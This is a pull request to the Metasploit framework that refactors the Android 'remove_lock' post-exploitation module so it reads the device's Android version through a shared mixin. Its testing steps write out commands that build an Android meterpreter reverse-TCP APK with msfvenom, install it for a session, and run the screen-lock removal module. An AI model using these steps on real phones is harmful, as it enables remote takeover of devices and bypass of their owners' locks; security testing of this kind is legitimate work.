### PR TITLE
Use Msf::Post::Android::System#get_build_prop to get the android version

### DIFF
--- a/lib/msf/core/post.rb
+++ b/lib/msf/core/post.rb
@@ -16,6 +16,7 @@ class Msf::Post < Msf::Module
   require 'msf/core/post/solaris'
   require 'msf/core/post/unix'
   require 'msf/core/post/windows'
+  require 'msf/core/post/android'
 
   include Msf::PostMixin
 

--- a/modules/post/android/manage/remove_lock.rb
+++ b/modules/post/android/manage/remove_lock.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/post/android'
 
 class Metasploit4 < Msf::Post
   Rank = NormalRanking
 
   include Msf::Post::Common
+  include Msf::Post::Android::System
 
   def initialize(info={})
     super( update_info( info, {
@@ -39,15 +41,25 @@ class Metasploit4 < Msf::Post
     ))
   end
 
-  def run
-    buildprop = cmd_exec('cat /system/build.prop')
+  def is_version_compat?
+    build_prop = get_build_prop
 
-    if buildprop.blank?
-      print_error("Blank build.prop, try again")
-      return
+    # Sometimes cmd_exec fails to cat build_prop, so the #get_build_prop method returns
+    # empty.
+    if build_prop.empty?
+      raise RuntimeError, "Failed to retrieve build.prop, you might need to try again."
     end
 
-    unless buildprop =~ /ro.build.version.release=4.[0|1|2|3]/
+    android_version = Gem::Version.new(build_prop['ro.build.version.release'])
+    if android_version <= Gem::Version.new('4.3') && android_version >= Gem::Version.new('4.0')
+      return true
+    end
+
+    false
+  end
+
+  def run
+    unless is_version_compat?
       print_error("This module is only compatible with Android versions 4.0 to 4.3")
       return
     end

--- a/modules/post/android/manage/remove_lock.rb
+++ b/modules/post/android/manage/remove_lock.rb
@@ -4,7 +4,6 @@
 ##
 
 require 'msf/core'
-require 'msf/core/post/android'
 
 class Metasploit4 < Msf::Post
   Rank = NormalRanking

--- a/modules/post/android/manage/remove_lock.rb
+++ b/modules/post/android/manage/remove_lock.rb
@@ -47,7 +47,7 @@ class Metasploit4 < Msf::Post
     # Sometimes cmd_exec fails to cat build_prop, so the #get_build_prop method returns
     # empty.
     if build_prop.empty?
-      raise RuntimeError, "Failed to retrieve build.prop, you might need to try again."
+      fail_with(Failure::Unknown, 'Failed to retrieve build.prop, you might need to try again.')
     end
 
     android_version = Gem::Version.new(build_prop['ro.build.version.release'])


### PR DESCRIPTION
Instead of grabbing the android version from the module, this is done by the mixin.

Testing:
- [x] Start an android emulator
- [x] start msfconsole
- [x] `use multi/handler`
- [x] `set payload android/meterpreter/reverse_tcp`
- [x] `set lhost IP`
- [x] `set lport 4444`
- [x] `run`
- [x] `./msfvenom -p android/meterpreter/reverse_tcp lhost=IP lport=4444 -o /tmp/android.apk`
- [x] `tools/install_msf_apk /tmp/android.apk`, this should give you a session
- [x] At the meterpreter prompt, do: `run post/android/manage/remove_lock`
- [x] If you are running an android device between 4.0 and 4.3, you should see that the module attempts to unlock the screen. If you're not using the compatible version, then the module should say "This module is only compatible with Android versions 4.0 to 4.3".
